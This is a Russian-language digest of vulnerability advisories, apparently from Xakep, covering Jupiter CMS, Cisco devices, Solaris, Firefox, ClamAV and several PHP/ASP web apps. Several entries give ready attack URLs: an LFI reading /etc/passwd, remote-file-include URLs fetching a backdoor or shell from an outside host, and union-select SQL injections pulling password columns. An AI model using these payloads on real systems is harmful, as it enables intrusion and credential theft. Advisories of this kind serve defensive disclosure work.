Эксплоит: http://www.xakep.ru/post/36798/ActSoft_DVD-Tools_Buffer_Overflow_exploit.txt
[ Доступ к файловой системе в Jupiter CMS ]
Программа: Jupiter CMS 1.1.5
Уязвимость позволяет загрузить произвольные файлы на целевую систему. Уязвимость существует из-за ошибки в проверке
входных данных при обработке GET и POST запросов. Атакующий может отправить специально составленные GET и POST запросы,
что позволит загрузить произвольные файлы на целевую систему.
Эксплоит: http://www.xakep.ru/post/36799/Jupiter_CMS_File_Upload_Vulnerability_exploit.txt
[ PHP-инклюдинг в Jupiter CMS ]
Программа: Jupiter CMS 1.1.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <n> сценарием index.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование
уязвимости требует выключение опции " magic_quotes_gpc" в конфигурационном файле PHP.
Примеры:
LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:[email protected]/backdoor
[ SQL-инъекция в Jupiter CMS ]
Программа: Jupiter CMS 1.1.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных при обработки заголовков запросов в поле <Client-IP>.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит: http://www.xakep.ru/post/36801/Jupiter_CMS_SQL_Injection_exploit.txt
[ Переполнение буфера в Microsoft Word ]
Программа:
Microsoft Office 2000
Microsoft Office XP
Microsoft Word 2000
Microsoft Word 2002
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке документов Microsoft Word. Атакующий может передать письмо со
вложенным специально сформированным документов, открытие которого приведет к выполнению произвольного кода.
[ Множественные уязвимости в Cisco IOS ]
Программа:
Cisco IOS 12.x
Cisco IOS R12.x
Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS атаку и обойти ограничения безопасности на
целевой системе.
1) Уязвимость возникает из-за того, что сигнатуры Cisco IOS IPS, использующие регулярные выражения не могут правильно
идентифицировать злонамеренный трафик в фрагментированных IP пакетах. Атакующий может передать специально сформированные
IP пакеты, что приведет к обходу механизма безопасности Cisco IOS IPS.
2) Уязвимость возникает из-за ошибки в механизме сканирования ATOMIC.TCP и сигнатурах, использующих регулярные
выражения (например, сигнатура 3123.0 для Netbus Pro Traffic). Атакующий может передать специально сформированные
пакеты, что приведет к отказу устройства в обслуживании.
[ Отказ в обслуживании в Sun Solaris ]
Программа: Sun Solaris 10
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки, приводящей в состояние гонок, в TCP подсистеме. Атакующий может передать специально сформированные данные,
что приведет к отказу системы в обслуживании.
[ Повышение привилегий в Sun Solaris ]
Программа:
Sun Solaris 10
Sun Solaris 8
Sun Solaris 9
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой
системе. Уязвимость существует из-за ошибки в проверке входных в X Font Server / X Render и DBE Extensions. Атакующий
может передать специально сформированные данные, что приведет к выполнению произвольного кода с повышенными привилегиями.
[ Обход ограничений безопасности в Mozilla Firefox ]
Программа: Mozilla Firefox 2.0.0.1
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость
существует из-за того, что Firefox не правильно обрабатывает записи в DOM свойство 'location.hostname'. Атакующий
может передать злонамеренные данные, содержащие символы <\x00>, что позволит манипулировать учетными данными на
основе cookie, контролировать как Web сайт отображается пользователю и обойти политику безопасности, регулирующую
контроль XMLHttpRequest запросов и доступ к данным cross-window/cross-frame.
Пример:
http://lcamtuf.dione.cc/ffhostname.html
[ Повышение привилегий в SUSE Linux ]
Программа: SUSE Linux
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой
системе. Уязвимость существует из-за того, что многие исполняемые файлы обрабатывают переменную 'LD_LIBRARY_PATH'
небезопасным образом. Атакующий может выполнить произвольный код с повышенными привилегиями.
[ PHP-инклюдинг в ZebraFeeds ]
Программа: ZebraFeeds 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <zf_path> сценариями aggregator.php и
controller.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями
Web сервера.
Пример:
http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
[ PHP-инклюдинг в nabopoll ]
Программа: nabopoll 1.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <path> сценарием survey.inc.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
[ Множественные уязвимости в Cisco Firewall Services Module ]
Программа:
Cisco Firewall Services Module (FWSM) 2.x
Cisco Firewall Services Module (FWSM) 3.x
Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности и совершить DoS атаку на
целевую систему.
1) Уязвимость существует из-за ошибки в расширенной проверке HTTP трафика. Атакующий может с помощью специально
сформированного HTTP запроса вызвать перезагрузку устройства.
2) Уязвимость существует из-за ошибки при проверке SIP пакетов. Атакующий может послать специально сформированный
SIP пакет и вызвать перезагрузку устройства. Для успешной эксплуатации уязвимости опция "SIP fixup" должна быть
включена (значение по умолчанию).
3) Уязвимость существует из-за ошибки в обработке HTTPS запросов. Атакующий может с помощью специально сформированного
HTTPS запроса вызвать перезагрузку устройства. Для успешной эксплуатации уязвимости "authentication for network access"
(auth-proxy)должен быть включен.
4) Уязвимость существует из-за ошибки в обработке HTTP запросов, содержащих слишком длинный URL. Атакующий может с
помощью специально сформированного HTTP запроса вызвать перезагрузку устройства. Для успешной эксплуатации уязвимости
"authentication for network access" (auth-proxy) должен быть включен.
5) Уязвимость существует из-за ошибки в обработке HTTPS трафика, направленного FWSM. Атакующий может с помощью
специально сформированного HTTPS запроса вызвать перезагрузку устройства. Для успешной эксплуатации уязвимости HTTPS
сервер должен быть запущен на целевом устройстве.
6) Уязвимость существует из-за ошибки в обработке SNMP запросов, полученных от доверенного хоста. Атакующий может с
помощью специально сформированного SNMP запроса вызвать перезагрузку устройства.
7) Уязвимость существует из-за ошибки в обработке списков доступа (Access Control Lists), использующих группы объектов.
Некорректное применение списков доступа администратором может привести к тому, что ACE (Access Control Entries) будут
пропущены или учтены не в том порядке, что может позволить злоумышленнику обойти некоторые ограничения безопасности.
[ Переполнение буфера в DjVu Browser Plug-In ]
Программа: DjVu Browser Plug-In 6.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в методе "ExportImageAs()". Атакующий может обманным образом заставить
пользователя посетить злонамеренную страницу, что приведет к выполнению произвольного кода.
[ SQL-инъекция в CodeAvalanche News ]
Программа: CodeAvalanche News 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <CAT_ID> сценарием inc_listnews.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Пример:
http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params
[ SQL-инъекция в Aktueldownload Haber scripti ]
Программа: Aktueldownload Haber scripti
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <id> сценарием HaberDetay.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Пример:
HaberDetay.asp?id=-1+union+select+0,1,kadi,4,5,parola,7+from+ayar
[ Переполнение буфера в EasyMail Objects ]
Программа: EasyMail Objects 6.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в компоненте IMAP4 при обработке аргументов, передаваемых методу "Connect".
Атакующий может передать специально сформированные данные большого размера (более 500 байт) в качестве аргумента имени
хоста, что приведет к переполнению буфера и выполнению произвольного кода.
[ Отказ в обслуживании в SpamAssassin ]
Программа: SpamAssassin 3.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных при обработке слишком длинных URI в содержании сообщения. Атакующий может передать
специально сформированные данные, что приведет к отказу системы в обслуживании.
[ Отказ в обслуживании и обход ограничений безопасности в Clam AntiVirus (clamav) ]
Программа: Clam AntiVirus (clamav) 0.x
Уязвимость позволяет удаленному злоумышленнику обхойти ограничения безопасности и выполнить DoS атаку на целевую систему.
1) Уязвимость существует из-за ошибки в проверке входных данных, передаваемых через параметр "id" при обработке MIME
заголовков. Атакующий может использовать атаку обхода директорий, что позволит перезаписать файл, содержащий вирусные
сигнатуры, и помешает детектированию злонамеренного ПО.
2) Уязвимость существует из-за ошибки в в обработке CAB файлов. Атакующий может передать специально составленный
CAB файл, с заголовком, содержащим запись нулевой длины, что помешает легитимным пользователям отправлять валидные архивы.
[ SQL-инъекция в WebTester ]
Программа: WebTester 5.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <typeID> сценарием directions.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Пример:
http://website/webtester/directions.php?testID=\'